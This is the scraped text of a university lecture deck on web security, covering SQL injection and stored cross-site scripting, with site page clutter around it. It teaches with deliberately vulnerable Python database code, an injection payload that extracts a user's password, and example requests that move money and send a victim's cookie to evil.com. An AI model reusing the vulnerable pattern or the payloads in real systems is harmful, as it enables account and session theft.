web security con t
play

Web Security, cont CS 161: Computer Security Prof. Vern Paxson - PowerPoint PPT Presentation

Nov 13, 2022 •500 likes •1.06k views

Web Security, cont CS 161: Computer Security Prof. Vern Paxson TAs: Jethro Beekman, Mobin Javed, Antonio Lupher, Paul Pearce & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 28, 2013 Goals For Today Make SQL

  1. Web Security, con’t CS 161: Computer Security Prof. Vern Paxson TAs: Jethro Beekman, Mobin Javed, Antonio Lupher, Paul Pearce & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 28, 2013

  2. Goals For Today • Make SQL injection attacks concrete • Cross-site scripting ( XSS ): tricking browsers into giving undue access to attacker’s Javascript – Stored XSS: attacker leaves Javascript lying around on benign web service for victim to stumble across – Reflected XSS: attacker gets user to click on specially- crafted URL with script in it, web service reflects it back • Revisit of CSRF (Cross-Site Request Forgery) • And/or driveby attacks

  3. Welcome to the Amazing World Of Squigler …

  4. Demo Tools • Squigler – Cool “ localhost ” web site(s) (Python/SQLite) – Developed by Arel Cordero, Ph.D. – I’ll put a copy on the class page in case you’d like to play with it • Bro : freeware network monitoring tool ( bro.org ) – Scriptable – Primarily designed for real-time intrusion detection – Will put copy of (simple) script on class page – bro.org

  5. SQL Injection: Summary • Target: web server that uses a back-end database • Attacker goal: inject or modify database commands to either read or alter web-site information • Attacker tools: ability to send requests to web server (e.g., via an ordinary browser) • Key trick: web server allows characters in attacker’s input to be interpreted as SQL control elements rather than simply as data

  6. Some Squigler Database Tables Squigs username body time 2013-02-27 ethan My first squig! 21:51:52 2013-02-27 cathy @ethan: borrr-ing! 21:52:06 … … …

  7. def ¡post_squig(user, ¡squig): ¡ ¡ ¡ ¡if ¡not ¡user ¡or ¡not ¡squig: ¡return ¡ ¡ ¡ ¡conn ¡= ¡sqlite3.connect(DBFN) ¡ ¡ ¡ ¡c ¡ ¡ ¡ ¡= ¡conn.cursor() ¡ ¡ ¡ ¡c.executescript("INSERT ¡INTO ¡squigs ¡VALUES ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡('%s', ¡'%s', ¡datetime('now'));" ¡% ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡(user, ¡squig)) ¡ ¡ ¡ ¡conn.commit() Server code for posting a “squig” ¡ ¡ ¡ ¡c.close() INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡'don't ¡contractions ¡work?', ¡ ¡ ¡ ¡ ¡ ¡date); Syntax error

  8. Squigler Database Tables, con’t Accounts username password public dilbert funny ‘t’ alice kindacool ‘f’ … … …

  9. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select (username || '  ' || password) from accounts where username='bob') || ' ' , ¡ ¡ ¡ ¡ ¡ ¡date);

  10. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select (username || '  ' || password) from accounts where username='bob') || ' ' , ¡ ¡ ¡ ¡ ¡ ¡date); Empty string literals

  11. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select (username || '  ' || password) from accounts where username='bob') || ' ' , ¡ ¡ ¡ ¡ ¡ ¡date); A blank separator, just for tidiness

  12. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select (username || '  ' || password) from accounts where username='bob') || ' ' , ¡ ¡ ¡ ¡ ¡ ¡date); Concatenation operator. Concatenation of string S with empty string is just S INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ (select (username || '  ' || password) from accounts where username='bob') , ¡ ¡ ¡ ¡ ¡ ¡date); Value of the squig will be Bob’s username and password!

  13. Dynamic Web Pages • Rather than static HTML, web pages can be expressed as a program, say written in Javascript : <title>Javascript demo page</title> <font size=30> Hello, <b> <script> var a = 1; var b = 2; document.write("world: ", a+b, "</b>"); </script>

  14. Javascript • Powerful web page programming language • Scripts are embedded in web pages returned by web server • Scripts are executed by browser. Can: – Alter page contents – Track events (mouse clicks, motion, keystrokes) – Read/set cookies – Issue web requests, read replies • (Note: despite name, has nothing to do with Java!)

  15. Confining the Power of Javascript Scripts • Given all that power, browsers need to make sure JS scripts don’t abuse it • For example, don’t want a script sent from hackerz.com web server to read cookies belonging to bank.com … • … or alter layout of a bank.com web page • … or read keystrokes typed by user while focus is on a bank.com page!

  16. Same Origin Policy • Browsers provide isolation for JS scripts via the Same Origin Policy ( SOP ) • Simple version: – Browser associates web page elements (layout, cookies, events) with a given origin ≈ web server that provided the page/cookies in the first place • Identity of web server is in terms of its hostname, e.g., bank.com • SOP = only scripts received from a web page’s origin have access to page’s elements

  17. XSS: Subverting the Same Origin Policy • It’d be Bad if an attacker from evil.com can fool your browser into executing script of their choice … – … with your browser believing the script’s origin to be some other site, like bank.com • One nasty/general approach for doing so is trick the server of interest (e.g., bank.com ) to actually send the attacker’s script to your browser! – Then no matter how carefully your browser checks, it’ll view script as from the same origin (because it is!) … – … and give it all that powerful/nasty access • Such attacks are termed Cross-Site Scripting ( XSS )

  19. Two Types of XSS (Cross-Site Scripting) • There are two main types of XSS attacks • In a stored (or “persistent”) XSS attack, the attacker leaves their script lying around on bank.com server – … and the server later unwittingly sends it to your browser – Your browser is none the wiser, and executes it within the same origin as the bank.com server

  20. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com

  21. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious script Server Patsy/Victim bank.com

  22. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim bank.com

  23. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious 2 request content User Victim script Server Patsy/Victim bank.com

  24. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim bank.com

  25. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  26. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script embedded in input as though server meant us to run it bank.com

  27. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script embedded in input as though server meant us to run it E.g., GET http://bank.com/sendmoney?to=DrEvil&amt=100000

  28. Stored XSS (Cross-Site Scripting) Attack Browser/Server And/Or: steal valuable data 6 evil.com 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script embedded in input as though server meant us to run it bank.com

  29. Stored XSS (Cross-Site Scripting) Attack Browser/Server And/Or: steal valuable data 6 evil.com 1 E.g., GET http://evil.com/steal/ document.cookie Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script embedded in input as though server meant us to run it bank.com

  30. Stored XSS (Cross-Site Scripting) Attack Browser/Server steal valuable data 6 evil.com 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script (A “stored” embedded in input XSS attack) as though server meant us to run it bank.com

  31. Stored XSS: Summary • Target: user with Javascript-enabled browser who visits user-generated-content page on vulnerable web service • Attacker goal: run script in user’s browser with same access as provided to server’s regular scripts (subvert SOP = Same Origin Policy ) • Attacker tools: ability to leave content on web server page (e.g., via an ordinary browser); optionally, a server used to receive stolen information such as cookies • Key trick: server fails to ensure that content uploaded to page does not contain embedded scripts • Notes: (1) do not confuse with Cross-Site Request Forgery (CSRF); (2) requires use of Javascript

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

What is network security? Friends and enemies: Alice, Bob, Trudy What is network security?

What is network security? Friends and enemies: Alice, Bob, Trudy What is network security?

Network security Network security Foundations: what is security? cryptography Network Security Network Security authentication message integrity key distribution and certification Security in practice: Srinidhi Varadarajan

332 views • 6 slides
Security Security as term, Possible Security violations Authentication Criteria for

Security Security as term, Possible Security violations Authentication Criteria for

BS1 WS19/20 topic-based slides Security Security as term, Possible Security violations Authentication Criteria for Trust in Computer Systems Three hearts of Windows Security DACLs A Look at Security System is secure if

988 views • 20 slides
CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC 410 / 611 : Operating Systems CPSC410/611: Security Security Security Attacks Security Threats Crypto Authentication Examples SSL Security Threats Breach of confidentiality unauthorized access to

458 views • 18 slides
Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security WS 06/07 Seminar Prof. Dr.-Ing. Jana Dittmann &amp; Dr.-Ing. Claus Vielhauer with support from Tobias Scheidat

419 views • 16 slides
1 X.800 Security Services X.800 Security Services X.800 Security Services Data integrity

1 X.800 Security Services X.800 Security Services X.800 Security Services Data integrity

Course Overview Course Requirements EECS 498-7/8 Cryptography and Network Security: www.citi.umich.edu/u/honey/security Principles and Practice (Third Edition) Computer Security Monday &amp; Friday, 9:00 10:30 William Stallings

670 views • 19 slides
A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security Introducing Spring Security View layer security Whats coming in Spring Security 3 E-mail: craig@habuma.com Blog: http://www.springloaded.info

452 views • 19 slides
Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security Foundations: what is security? cryptography authentication message integrity key distribution and certification Security in practice:

634 views • 36 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CSCE Intro to Computer Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies Security

472 views • 20 slides
SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS Few Security Breaches Date: 2013-14 September 2016, while in negotiations to

404 views • 18 slides
Security Security with Distributed Systems Why Security? The need for security mechanisms in

Security Security with Distributed Systems Why Security? The need for security mechanisms in

Security Security with Distributed Systems Why Security? The need for security mechanisms in distributed systems arises from the desire to share resources Resources must be protected against unauthorized access, as enemies (attackers)

1.16k views • 67 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CPSC 410/611 Operating Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies

419 views • 19 slides
International and Global Security 1 Peer Discussion What is security? 2 International

International and Global Security 1 Peer Discussion What is security? 2 International

International and Global Security 1 Peer Discussion What is security? 2 International Security What is security? Freedom from threats to core values? Contestation over referent object: Individual? State? System? How is security achieved?

715 views • 11 slides
Security 101 Definition of Information Security Information security is the protection of

Security 101 Definition of Information Security Information security is the protection of

Computing Services Information Security Office Security 101 Definition of Information Security Information security is the protection of information and systems from unauthorized access, disclosure, modification, destruction or disruption. The

469 views • 22 slides
Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety Sensitive Information Not for public or media release F.S. 119.071. Required by law, rule and regulation: Homeland Security Directive 5 and 8.

393 views • 11 slides
Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the computing world, and are parallel to even older problems outside computing Required level of security is always related to what you protect

237 views • 23 slides
Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn

Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn

ITS335 Intro. to Security Concepts Threats, Attacks, Assets Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 2

965 views • 34 slides
Lisp and .NET Using Lisp to Generate .NET Business Applications Focus on Productivity Comac

Lisp and .NET Using Lisp to Generate .NET Business Applications Focus on Productivity Comac

Lisp and .NET Using Lisp to Generate .NET Business Applications Focus on Productivity Comac is a fulfillment and digital print services company for marketing materials My job is to build business applications ROI is the key Lisp

439 views • 15 slides
The intersection between HTML and programming 4 May 1999 Administrivia 4 handouts in back

The intersection between HTML and programming 4 May 1999 Administrivia 4 handouts in back

Computer Science E-1: Introduction to Personal Computers and the Internet Spring 1999 The intersection between HTML and programming 4 May 1999 Administrivia 4 handouts in back (including this one) Assignment 11 is due this week; no

146 views • 3 slides
INTERNET SERVICES 2110414 Large Scale Computing Systems Natawut Nupairoj, Ph.D. Outline 2

INTERNET SERVICES 2110414 Large Scale Computing Systems Natawut Nupairoj, Ph.D. Outline 2

2110414 - Large Scale Computing Systems 1 LARGE SCALE INTERNET SERVICES 2110414 Large Scale Computing Systems Natawut Nupairoj, Ph.D. Outline 2 Overview Background Knowledge Architectural Case Studies Real-World Case Study

609 views • 35 slides
CS 410/510: Web Basics Basics Web Clients HTTP Web Servers PC running Firefox Web

CS 410/510: Web Basics Basics Web Clients HTTP Web Servers PC running Firefox Web

CS 410/510: Web Basics Basics Web Clients HTTP Web Servers PC running Firefox Web Server Mac running Chrome Web Clients Basic Terminology | HTML | JavaScript Terminology Web page consists of objects Each object is

761 views • 47 slides
iUniverse A Collaborative Information Universe for IU Investigator: Katy Brner

iUniverse A Collaborative Information Universe for IU Investigator: Katy Brner

iUniverse A Collaborative Information Universe for IU Investigator: Katy Brner katy@indiana.edu Students taking the User Interface Design Class at SLIS, IUB use Active Worlds Technology and offer faculty at IU interested to

396 views • 5 slides
Real Commerce in Virtual Worlds Sascha Vitzthum(Illinois Wesleyan University) Abhishek Kathuria

Real Commerce in Virtual Worlds Sascha Vitzthum(Illinois Wesleyan University) Abhishek Kathuria

Real Commerce in Virtual Worlds Sascha Vitzthum(Illinois Wesleyan University) Abhishek Kathuria &amp; Benn Konsynski (Emory University) Introduction Directions in commerce practice in Virtual World (VW) environments? Similarities &amp;

276 views • 17 slides
Cable Beach and John Hurliman VWRAP Intel Labs 1 What is Cable Beach? Researching the next

Cable Beach and John Hurliman VWRAP Intel Labs 1 What is Cable Beach? Researching the next

Cable Beach and John Hurliman VWRAP Intel Labs 1 What is Cable Beach? Researching the next steps in virtual world scalability How will the introduction of more virtual worlds and larger virtual worlds impact content, identity, and

546 views • 16 slides
Blocks Designing for Scale and Innovation for the worlds largest ticket marketplace Charlie

Blocks Designing for Scale and Innovation for the worlds largest ticket marketplace Charlie

Building Blocks and Stumbling Blocks Designing for Scale and Innovation for the worlds largest ticket marketplace Charlie Fineman Confidential Slide 1 Were not the size of mother eBay but 5M orders on 1.5-2M Active listings

509 views • 19 slides

More recommend